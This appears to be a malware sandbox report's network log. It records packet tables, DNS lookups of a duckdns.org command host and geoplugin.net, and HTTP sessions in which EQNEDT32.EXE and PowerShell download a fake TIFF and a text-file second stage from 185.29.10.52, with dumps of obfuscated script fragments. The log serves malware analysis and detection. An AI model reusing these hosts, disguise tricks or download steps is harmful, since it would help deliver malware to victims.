Sep 26, 2024 10:35:21.078761101 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:21.078830004 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:21.083020926 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:21.083076000 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:21.083146095 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:21.083226919 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:21.083308935 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:21.083370924 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:21.083415031 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:21.083441973 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:21.083467960 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:21.083492994 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:21.083518982 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:21.083544016 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:21.083569050 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:21.083594084 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:21.083619118 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:21.083645105 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:21.083669901 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:21.083674908 CEST | 49168 | 14645 | 192.168.2.22 | 192.210.150.29
Sep 26, 2024 10:35:21.083695889 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:21.088632107 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:21.088660955 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:21.088686943 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:21.642493963 CEST | 49167 | 14645 | 192.168.2.22 | 192.210.150.29
Sep 26, 2024 10:35:21.649473906 CEST | 14645 | 49167 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:21.749340057 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:21.773968935 CEST | 49168 | 14645 | 192.168.2.22 | 192.210.150.29
Sep 26, 2024 10:35:21.776146889 CEST | 49168 | 14645 | 192.168.2.22 | 192.210.150.29
Sep 26, 2024 10:35:21.779001951 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:21.779016972 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:21.779028893 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:21.779040098 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:21.779052973 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:21.779063940 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:21.779171944 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:21.779182911 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:21.779195070 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:21.779364109 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:21.783777952 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:21.783790112 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:21.783819914 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:21.783849001 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:21.783862114 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:21.783958912 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:21.783971071 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:21.783991098 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:21.784010887 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:21.784038067 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:21.784049034 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:21.784060001 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:21.784070969 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:21.784117937 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:21.784132004 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:21.784153938 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:21.784173012 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:21.784183979 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:21.784291983 CEST | 49168 | 14645 | 192.168.2.22 | 192.210.150.29
Sep 26, 2024 10:35:21.784291983 CEST | 49168 | 14645 | 192.168.2.22 | 192.210.150.29
Sep 26, 2024 10:35:21.789203882 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:21.789216995 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:21.789228916 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:22.654304981 CEST | 49167 | 14645 | 192.168.2.22 | 192.210.150.29
Sep 26, 2024 10:35:22.659399033 CEST | 14645 | 49167 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:22.762228966 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:22.792808056 CEST | 49168 | 14645 | 192.168.2.22 | 192.210.150.29
Sep 26, 2024 10:35:22.795042992 CEST | 49168 | 14645 | 192.168.2.22 | 192.210.150.29
Sep 26, 2024 10:35:22.797753096 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:22.797779083 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:22.797792912 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:22.797806025 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:22.797817945 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:22.797828913 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:22.797945976 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:22.797957897 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:22.798021078 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:22.798264027 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:22.802476883 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:22.802489996 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:22.802525997 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:22.802541018 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:22.802556992 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:22.802587032 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:22.802598953 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:22.802654982 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:22.802670956 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:22.802709103 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:22.802723885 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:22.802751064 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:22.802762985 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:22.802787066 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:22.802798033 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:22.802817106 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:22.802829027 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:22.802839994 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:22.803158045 CEST | 49168 | 14645 | 192.168.2.22 | 192.210.150.29
Sep 26, 2024 10:35:22.808006048 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:22.808135033 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:23.669281006 CEST | 49167 | 14645 | 192.168.2.22 | 192.210.150.29
Sep 26, 2024 10:35:23.674295902 CEST | 14645 | 49167 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:23.779298067 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:23.813453913 CEST | 49168 | 14645 | 192.168.2.22 | 192.210.150.29
Sep 26, 2024 10:35:23.815608978 CEST | 49168 | 14645 | 192.168.2.22 | 192.210.150.29
Sep 26, 2024 10:35:23.818480015 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:23.818500996 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:23.818559885 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:23.818568945 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:23.818589926 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:23.818598032 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:23.818645000 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:23.818653107 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:23.818686962 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:23.818723917 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:23.823194027 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:23.823203087 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:23.823282003 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:23.823290110 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:23.823319912 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:23.823378086 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:23.823399067 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:23.823453903 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:23.823462963 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:23.823506117 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:23.823513985 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:23.823554993 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:23.823565006 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:23.823596001 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:23.823630095 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:23.823673010 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:23.823724985 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:23.823734999 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:23.823826075 CEST | 49168 | 14645 | 192.168.2.22 | 192.210.150.29
Sep 26, 2024 10:35:23.823826075 CEST | 49168 | 14645 | 192.168.2.22 | 192.210.150.29
Sep 26, 2024 10:35:23.828809977 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:23.828819990 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:23.828826904 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:23.835598946 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:23.835752010 CEST | 49168 | 14645 | 192.168.2.22 | 192.210.150.29
Sep 26, 2024 10:35:23.835796118 CEST | 49168 | 14645 | 192.168.2.22 | 192.210.150.29
Sep 26, 2024 10:35:23.837515116 CEST | 14645 | 49167 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:23.837601900 CEST | 49167 | 14645 | 192.168.2.22 | 192.210.150.29
Sep 26, 2024 10:35:23.840748072 CEST | 14645 | 49168 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:24.682590961 CEST | 49167 | 14645 | 192.168.2.22 | 192.210.150.29
Sep 26, 2024 10:35:24.687685966 CEST | 14645 | 49167 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:46.621634007 CEST | 14645 | 49164 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:35:46.623367071 CEST | 49164 | 14645 | 192.168.2.22 | 192.210.150.29
Sep 26, 2024 10:35:46.628278971 CEST | 14645 | 49164 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:36:16.874304056 CEST | 14645 | 49164 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:36:16.879919052 CEST | 49164 | 14645 | 192.168.2.22 | 192.210.150.29
Sep 26, 2024 10:36:16.884865999 CEST | 14645 | 49164 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:36:47.382083893 CEST | 14645 | 49164 | 192.210.150.29 | 192.168.2.22
Sep 26, 2024 10:36:47.383764029 CEST | 49164 | 14645 | 192.168.2.22 | 192.210.150.29
Sep 26, 2024 10:36:47.388657093 CEST | 14645 | 49164 | 192.210.150.29 | 192.168.2.22
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 26, 2024 10:33:08.757597923 CEST | 54562 | 53 | 192.168.2.22 | 8.8.8.8
Sep 26, 2024 10:33:08.767708063 CEST | 53 | 54562 | 8.8.8.8 | 192.168.2.22
Sep 26, 2024 10:33:14.842161894 CEST | 52917 | 53 | 192.168.2.22 | 8.8.8.8
Sep 26, 2024 10:33:14.950571060 CEST | 53 | 52917 | 8.8.8.8 | 192.168.2.22
Sep 26, 2024 10:33:17.528398037 CEST | 62751 | 53 | 192.168.2.22 | 8.8.8.8
Sep 26, 2024 10:33:17.537029028 CEST | 53 | 62751 | 8.8.8.8 | 192.168.2.22
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 26, 2024 10:33:08.757597923 CEST | 192.168.2.22 | 8.8.8.8 | 0x9af3 | Standard query (0) | ia600100.us.archive.org | A (IP address) | IN (0x0001) | false
Sep 26, 2024 10:33:14.842161894 CEST | 192.168.2.22 | 8.8.8.8 | 0x4531 | Standard query (0) | authurremc.duckdns.org | A (IP address) | IN (0x0001) | false
Sep 26, 2024 10:33:17.528398037 CEST | 192.168.2.22 | 8.8.8.8 | 0xcd37 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                        Sep 26, 2024 10:33:08.767708063 CEST | 8.8.8.8 | 192.168.2.22 | 0x9af3 | No error (0) | ia600100.us.archive.org | - | 207.241.227.240 | A (IP address) | IN (0x0001) | false
                        Sep 26, 2024 10:33:14.950571060 CEST | 8.8.8.8 | 192.168.2.22 | 0x4531 | No error (0) | authurremc.duckdns.org | - | 192.210.150.29 | A (IP address) | IN (0x0001) | false
                        Sep 26, 2024 10:33:17.537029028 CEST | 8.8.8.8 | 192.168.2.22 | 0xcd37 | No error (0) | geoplugin.net | - | 178.237.33.50 | A (IP address) | IN (0x0001) | false
                        • ia600100.us.archive.org
                        • 185.29.10.52
                        • geoplugin.net
                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        0 | 192.168.2.22 | 49161 | 185.29.10.52 | 80 | 3352 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 26, 2024 10:33:03.408983946 CEST | 343 | OUT | GET /550/makepicturewithgreatthingstobeonline.tIF HTTP/1.1
                        Accept: */*
                        Accept-Encoding: gzip, deflate
                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                        Host: 185.29.10.52
                        Connection: Keep-Alive
                        Sep 26, 2024 10:33:04.049181938 CEST | 1236 | IN | HTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 08:36:03 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                        Last-Modified: Thu, 26 Sep 2024 01:34:46 GMT
                        ETag: "3b21c-622fbbe693b20"
                        Accept-Ranges: bytes
                        Content-Length: 242204
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: image/tiff
                        Data Raw: ff fe 61 00 4c 00 54 00 43 00 4b 00 6e 00 6f 00 48 00 6e 00 63 00 43 00 66 00 5a 00 54 00 64 00 64 00 6f 00 69 00 4a 00 63 00 50 00 50 00 63 00 20 00 3d 00 20 00 22 00 43 00 7a 00 57 00 6b 00 47 00 41 00 4c 00 6a 00 57 00 50 00 61 00 4b 00 63 00 50 00 63 00 4a 00 52 00 76 00 75 00 68 00 57 00 63 00 5a 00 22 00 0d 00 0a 00 75 00 63 00 47 00 63 00 65 00 51 00 4e 00 63 00 4b 00 5a 00 6a 00 63 00 4c 00 51 00 49 00 57 00 49 00 49 00 66 00 42 00 4e 00 6f 00 4c 00 20 00 3d 00 20 00 22 00 50 00 49 00 6f 00 4b 00 57 00 7a 00 6a 00 66 00 57 00 41 00 62 00 57 00 47 00 6f 00 71 00 4b 00 4e 00 68 00 41 00 57 00 4c 00 4c 00 42 00 22 00 0d 00 0a 00 61 00 6f 00 5a 00 61 00 47 00 62 00 73 00 4c 00 78 00 6e 00 4b 00 4b 00 70 00 47 00 55 00 53 00 49 00 63 00 4c 00 70 00 50 00 72 00 55 00 20 00 3d 00 20 00 22 00 5a 00 75 00 57 00 4b 00 78 00 47 00 6e 00 70 00 6e 00 48 00 47 00 52 00 4c 00 69 00 63 00 57 00 43 00 71 00 6f 00 55 00 6b 00 6b 00 68 00 22 00 0d 00 0a 00 72 00 4f 00 55 00 55 00 41 00 6d 00 65 00 41 00 69 00 [TRUNCATED]
                        Data Ascii: aLTCKnoHncCfZTddoiJcPPc = "CzWkGALjWPaKcPcJRvuhWcZ"ucGceQNcKZjcLQIWIIfBNoL = "PIoKWzjfWAbWGoqKNhAWLLB"aoZaGbsLxnKKpGUSIcLpPrU = "ZuWKxGnpnHGRLicWCqoUkkh"rOUUAmeAiaZapCGGpTWGKLW = "iKgicKCpeqhKTkWoLNGLHka"nlOGlcLSWWOWokLkWJcseLU = "WKccLUKWocjfOKaLpQUCRON"oHLWOibmhZszRBKLUiLcWiJ = "TzLpfphBbclHLjlqLxWZbPz"WsdULzppWLKkGLGxWLzuhia = "iUjimfmphLbQNgCeKNkbWvA"KsWamhKzpkbifWWoKWbdWxz = "ItBKLxSkjdJPmeuiZRLGWuh"idlrlzUmGCUozbioczPLmkN = "ZGccGfheZ
                        Sep 26, 2024 10:33:04.049241066 CEST | 1236 | IN | Data Raw: 00 69 00 6c 00 55 00 6b 00 76 00 41 00 61 00 63 00 65 00 72 00 6e 00 61 00 64 00 61 00 61 00 65 00 63 00 6b 00 4b 00 22 00 0d 00 0a 00 55 00 69 00 4c 00 4c 00 41 00 71 00 7a 00 61 00 55 00 47 00 63 00 4c 00 66 00 7a 00 6c 00 55 00 73 00 70 00 6c
                        Data Ascii: ilUkvAacernadaaeckK"UiLLAqzaUGcLfzlUspliPld = "LWLUiBOvdhLemfqkhczpKem"dzmWzcbCdbafffpGBLkWKWC = "zCJWAJBhpWGtxptLG
                        Sep 26, 2024 10:33:04.049274921 CEST | 1236 | IN | Data Raw: 00 5a 00 4c 00 4c 00 4c 00 69 00 6c 00 57 00 4b 00 51 00 57 00 4e 00 54 00 47 00 74 00 20 00 3d 00 20 00 22 00 43 00 6e 00 57 00 52 00 4c 00 6e 00 6b 00 66 00 67 00 6e 00 57 00 42 00 49 00 66 00 6d 00 57 00 62 00 48 00 4c 00 7a 00 62 00 6c 00 76
                        Data Ascii: ZLLLilWKQWNTGt = "CnWRLnkfgnWBIfmWbHLzblv"WKLeqizrLWctWaKkmNceirm = "AbAzOistdNxlaLJqcqgPIoW"AumNKfQAlgGBRRxHiirGAUN
                        Sep 26, 2024 10:33:04.049307108 CEST | 1236 | IN | Data Raw: 00 55 00 69 00 78 00 47 00 4b 00 55 00 6d 00 50 00 47 00 52 00 6e 00 6d 00 57 00 22 00 0d 00 0a 00 55 00 6b 00 63 00 6f 00 66 00 4c 00 75 00 43 00 4b 00 4b 00 53 00 6d 00 6b 00 47 00 6d 00 63 00 4e 00 63 00 52 00 6e 00 55 00 6e 00 4c 00 20 00 3d
                        Data Ascii: UixGKUmPGRnmW"UkcofLuCKKSmkGmcNcRnUnL = "qepbLOWUkbLvfmLWRPALoWW"GcnUWOnpxLLLeHBLmKifWoL = "NuLfxRWjuOfppKZkhuBbWsL"
                        Sep 26, 2024 10:33:04.049341917 CEST | 896 | IN | Data Raw: 00 22 00 0d 00 0a 00 4e 00 65 00 62 00 62 00 47 00 4c 00 4e 00 4e 00 71 00 42 00 62 00 52 00 4c 00 4c 00 48 00 4c 00 6b 00 78 00 55 00 4b 00 49 00 6f 00 64 00 20 00 3d 00 20 00 22 00 75 00 42 00 4e 00 48 00 52 00 7a 00 57 00 6c 00 6c 00 50 00 4c
                        Data Ascii: "NebbGLNNqBbRLLHLkxUKIod = "uBNHRzWllPLkCLorRhCfnTi"ppLbLKWAkccOgLGkoipWGCc = "WLLsZizLaiSJnklWGoxpftk"CKhiLKSbpPWW
                        Sep 26, 2024 10:33:04.144798994 CEST | 1236 | IN | Data Raw: 00 4c 00 48 00 61 00 42 00 20 00 3d 00 20 00 22 00 6b 00 6a 00 4e 00 4b 00 4b 00 63 00 41 00 6d 00 4a 00 41 00 42 00 47 00 65 00 42 00 68 00 41 00 49 00 4c 00 50 00 5a 00 4b 00 6d 00 57 00 22 00 0d 00 0a 00 4c 00 69 00 52 00 57 00 69 00 69 00 55
                        Data Ascii: LHaB = "kjNKKcAmJABGeBhAILPZKmW"LiRWiiUhLGNhhNWLtoAfpLi = "WULWNRKnCUBduzcWxiBWWco"aeoGqLSeWNUtGALnWNrGLRG = "CuWohmO
                        Sep 26, 2024 10:33:04.144856930 CEST | 1236 | IN | Data Raw: 00 47 00 62 00 52 00 66 00 68 00 57 00 54 00 43 00 42 00 41 00 7a 00 55 00 66 00 63 00 4b 00 4c 00 70 00 4c 00 62 00 52 00 50 00 6b 00 20 00 3d 00 20 00 22 00 7a 00 41 00 6b 00 50 00 52 00 4c 00 4c 00 50 00 4c 00 74 00 6e 00 6d 00 52 00 64 00 66
                        Data Ascii: GbRfhWTCBAzUfcKLpLbRPk = "zAkPRLLPLtnmRdfZoWZNiUx"OZcWLOUGLbGfLZuAzBjTBUK = "OitmNqUBcHUhKzKciqfLWeb"ZWZTiehUxBKdtLLf
                        Sep 26, 2024 10:33:04.144913912 CEST | 1236 | IN | Data Raw: 00 3d 00 20 00 22 00 74 00 4c 00 4f 00 50 00 50 00 4c 00 68 00 43 00 57 00 64 00 4b 00 61 00 53 00 57 00 4c 00 63 00 74 00 4b 00 4b 00 7a 00 52 00 75 00 57 00 22 00 0d 00 0a 00 55 00 66 00 5a 00 41 00 4e 00 57 00 4c 00 6a 00 5a 00 68 00 7a 00 4b
                        Data Ascii: = "tLOPPLhCWdKaSWLctKKzRuW"UfZANWLjZhzKhNmCicBJfKi = "hZblPTWmpzkvbfLWLAGALLZ"KihztcPOZimLOLfPuNUPZko = "mcsKhmroklJL
                        Sep 26, 2024 10:33:04.144948959 CEST | 672 | IN | Data Raw: 00 4b 00 47 00 4a 00 63 00 49 00 4c 00 48 00 57 00 4e 00 6f 00 64 00 4b 00 70 00 57 00 47 00 57 00 4b 00 4b 00 4c 00 20 00 3d 00 20 00 22 00 68 00 61 00 4c 00 49 00 4f 00 66 00 54 00 71 00 72 00 4a 00 69 00 4c 00 4b 00 4c 00 4b 00 70 00 68 00 50
                        Data Ascii: KGJcILHWNodKpWGWKKL = "haLIOfTqrJiLKLKphPLkpiP"NUkPaKRPbLcUdibhQoWGLei = "zWpAUpocoiiLpcLsWBefhLj"uWbPRQkkKtcesmQpQfP
                        Sep 26, 2024 10:33:04.144984961 CEST | 1236 | IN | Data Raw: 00 57 00 48 00 6b 00 20 00 3d 00 20 00 22 00 65 00 64 00 65 00 65 00 50 00 6d 00 4c 00 57 00 63 00 64 00 48 00 6b 00 4b 00 6b 00 61 00 6b 00 57 00 4c 00 4c 00 71 00 50 00 48 00 4b 00 22 00 0d 00 0a 00 4e 00 55 00 43 00 4a 00 57 00 6e 00 50 00 4c
                        Data Ascii: WHk = "edeePmLWcdHkKkakWLLqPHK"NUCJWnPLmaPuULrBKGBbLif = "WUimuOtLzPLiGzkqUPnICKu"ARxffkcJUCQhKKjLGGoxLAW = "CkfmWlbA
                        Sep 26, 2024 10:33:04.145025969 CEST | 1236 | IN | Data Raw: 00 6e 00 6a 00 22 00 0d 00 0a 00 47 00 4c 00 47 00 5a 00 43 00 6f 00 63 00 49 00 64 00 47 00 68 00 50 00 4c 00 42 00 48 00 6b 00 63 00 49 00 64 00 6b 00 47 00 6e 00 4c 00 20 00 3d 00 20 00 22 00 6d 00 62 00 4c 00 55 00 7a 00 63 00 4c 00 43 00 63
                        Data Ascii: nj"GLGZCocIdGhPLBHkcIdkGnL = "mbLUzcLCcernadaGZZLhtzLqlZhp"LcUiKbcTOmGbKAkqazvioLt = "zKkWOfRcAoiIWetixCUWPpC"iPcdL


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        1 | 192.168.2.22 | 49163 | 185.29.10.52 | 80 | 3680 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 26, 2024 10:33:11.837939024 CEST | 74 | OUT | GET /550/RGBV.txt HTTP/1.1
                        Host: 185.29.10.52
                        Connection: Keep-Alive
                        Sep 26, 2024 10:33:12.474556923 CEST | 1236 | IN | HTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 08:36:11 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                        Last-Modified: Thu, 26 Sep 2024 01:32:10 GMT
                        ETag: "a1000-622fbb5131288"
                        Accept-Ranges: bytes
                        Content-Length: 659456
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: text/plain
